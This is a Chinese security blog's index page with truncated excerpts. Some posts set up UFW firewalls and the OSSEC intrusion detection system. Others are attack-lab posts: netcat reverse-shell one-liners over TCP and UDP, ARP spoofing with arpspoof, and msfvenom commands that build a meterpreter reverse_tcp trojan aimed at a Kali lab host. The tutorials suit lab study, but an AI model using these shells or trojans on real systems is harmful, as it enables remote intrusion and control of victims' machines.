zhang35的博客

配置默认策略sudo vim /etc/default/ufw有如下默认规则：IPV6=yes这个开启时，写一条规则将自动变成两条：IPv4的和IPv6的；如果用不上的话可以将其改为no。配置进入规则默认情况下开启ufw，会禁止一切从外到内的连接，可以直接建立白名单规则。也可以手动配置是否禁用一切进入：sudo ufw default allow incomingsudo u...

主机1监听端口，主机2发起连接。TCP shell主机1：nc -nvlp 4444主机2：/bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipeUDP shell攻击机：nc -nuvlp 4444靶机：mkfifo fifonc -u 主机1的IP 4444 < fifo |{ ec...

环境攻击机：Kali Linux 2020.1 172.16.252.129靶机：Ubuntu 16.04 172.16.252.138网关：172.16.252.2安装arpspoofKali Linux 2020.1 VM版本身没有arpspoof工具，需要自己安装。arpspoof是dsniff的一个组件，直接安装dsniff：sudo apt-get install dsnif...

问题描述用msf生成Ubuntu 16.04的反向连接木马：msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf开启监听：msfconsoleuse exploit/multi/handlerset payload windows/mete...

环境攻击机：Kali Linux 2020.1 172.16.252.129靶机：Ubuntu 16.04 172.16.252.138生成木马使用kali自带的Msfvenom工具生成木马。查看有哪些linux下的载荷：msfvenom -l payloads | grep linux针对Ubuntu 64位靶机，使用linux/x64/meterpreter/reverse_t...

OSSEC的log文件监控(LIDS，log-based intrusion detection），能检测攻击、误用、系统错误等。agent端不产生alerts，全部由server集中分析处理。具体参考官方文档：Log monitoring/analysis文件监控ossec-logcollector进程负责监控log文件和事件，有新的日志消息时就转发到server。配置文件为ossec...

若Agent和Server无法连接，下面是常用检查流程。检查网络是否连通ping serverIP重启server和agentsudo /var/ossec/bin/ossec-control restart检查rids文件夹OSSEC依赖rids文件夹实现同步。server端/var/ossec/queue/rids 文件夹下应该保存有每个agent ID号同名的文件。假如有...

服务器端配置添加Agent执行：sudo /var/ossec/bin/manage_agents执行默认的A选项：***************************************** OSSEC HIDS v3.6.0 Agent manager. ** The following options are available: ****************...

参考官网文档：OSSEC Installation安装环境Ubuntu 16.04 VMware虚拟机安装依赖包安装build-essential来编译安装OSSEC，为了使用系统的pcre2库，安装libpcre2-dev包：apt-get install build-essential make zlib1g-dev libpcre2-dev为了支持数据库，需要安装mysq...